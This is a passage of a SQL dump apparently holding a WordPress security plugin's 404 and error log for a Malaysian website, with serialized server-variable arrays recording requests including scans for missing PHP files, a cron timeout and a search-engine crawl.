;s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYn5LMrlkXDIX@rVBbEHTQAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569324223.8202\";s:12:\"REQUEST_TIME\";s:10:\"1569324223\";}}','notice','2019-09-24 11:24:12','2019-09-24 11:23:47',30791224,31043408,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569323308.9349830150604248046875',1,0,'103.6.198.69'),(27108,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wp-content/wp-arth.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=6592e665114f5ff14dab86dc534da413\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wp-content/wp-arth.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:23:\"/wp-content/wp-arth.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0Gd1WB4BRJuHfwY@mOMwAAAMg\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wp-content/wp-arth.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wp-content/wp-arth.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0Gd1WB4BRJuHfwY@mOMwAAAMg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.29\";s:11:\"REMOTE_PORT\";s:5:\"36147\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wp-content/wp-arth.php\";s:10:\"SCRIPT_URL\";s:23:\"/wp-content/wp-arth.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0Gd1WB4BRJuHfwY@mOMwAAAMg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523319.7252\";s:12:\"REQUEST_TIME\";s:10:\"1569523319\";}}','notice','2019-09-26 18:42:01','2019-09-26 18:42:00',35178368,36990864,'https://bintara.com.my/wp-content/wp-arth.php',1,0,'185.220.101.29'),(27107,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/wp-content/x.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=6592e665114f5ff14dab86dc534da413\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/wp-content/x.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/wp-content/x.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GaVfhYxBkXBDDAIo93QAAAIg\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/wp-content/x.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/wp-content/x.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GaVfhYxBkXBDDAIo93QAAAIg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.29\";s:11:\"REMOTE_PORT\";s:5:\"35661\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/wp-content/x.php\";s:10:\"SCRIPT_URL\";s:17:\"/wp-content/x.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GaVfhYxBkXBDDAIo93QAAAIg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523305.1643\";s:12:\"REQUEST_TIME\";s:10:\"1569523305\";}}','notice','2019-09-26 18:41:46','2019-09-26 18:41:45',35181944,36992896,'https://bintara.com.my/wp-content/x.php',1,0,'185.220.101.29'),(27106,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/swin.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/swin.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/swin.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GXlfhYxBkXBDDAIo9zwAAAIo\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/swin.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/swin.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GXlfhYxBkXBDDAIo9zwAAAIo\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.29\";s:11:\"REMOTE_PORT\";s:5:\"33801\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/swin.php\";s:10:\"SCRIPT_URL\";s:9:\"/swin.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GXlfhYxBkXBDDAIo9zwAAAIo\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523294.6367\";s:12:\"REQUEST_TIME\";s:10:\"1569523294\";}}','notice','2019-09-26 18:41:36','2019-09-26 18:41:35',35177216,36983200,'https://bintara.com.my/swin.php',1,0,'185.220.101.29'),(27105,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/wp-content/feal.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b57eead6ea69ddfdb47725a345aab4f5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/feal.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/wp-content/feal.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GU1WB4BRJuHfwY@mOLQAAANU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/feal.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/wp-content/feal.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GU1WB4BRJuHfwY@mOLQAAANU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.29\";s:11:\"REMOTE_PORT\";s:5:\"38869\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/feal.php\";s:10:\"SCRIPT_URL\";s:20:\"/wp-content/feal.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GU1WB4BRJuHfwY@mOLQAAANU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569523283.225\";s:12:\"REQUEST_TIME\";s:10:\"1569523283\";}}','notice','2019-09-26 18:41:25','2019-09-26 18:41:23',35180320,36986480,'https://bintara.com.my/wp-content/feal.php',1,0,'185.220.101.29'),(27090,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569496661.7849440574645996093750\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569496661.7849440574645996093750\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569496661.7849440574645996093750\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569496661.7849440574645996093750\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"60172\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569496661.7849440574645996093750\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYyeVeTQ4LALSh7k@hP6kQAAAJU\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYyeVeTQ4LALSh7k@hP6kQAAAJU\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"60172\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYyeVeTQ4LALSh7k@hP6kQAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569497573.1656\";s:12:\"REQUEST_TIME\";s:10:\"1569497573\";}}','notice','2019-09-26 11:33:16','2019-09-26 11:32:57',35199120,35452144,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569496661.7849440574645996093750',1,0,'103.6.198.69'),(27089,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-20/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-20/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-20/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYyXdFRed5u6rkjAaVZl4QAAABQ\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-20/\";s:11:\"REMOTE_ADDR\";s:12:\"207.46.13.62\";s:11:\"REMOTE_PORT\";s:5:\"14092\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-20/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-20/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYyXdFRed5u6rkjAaVZl4QAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569494900.6346\";s:12:\"REQUEST_TIME\";s:10:\"1569494900\";}}','notice','2019-09-26 10:48:23','2019-09-26 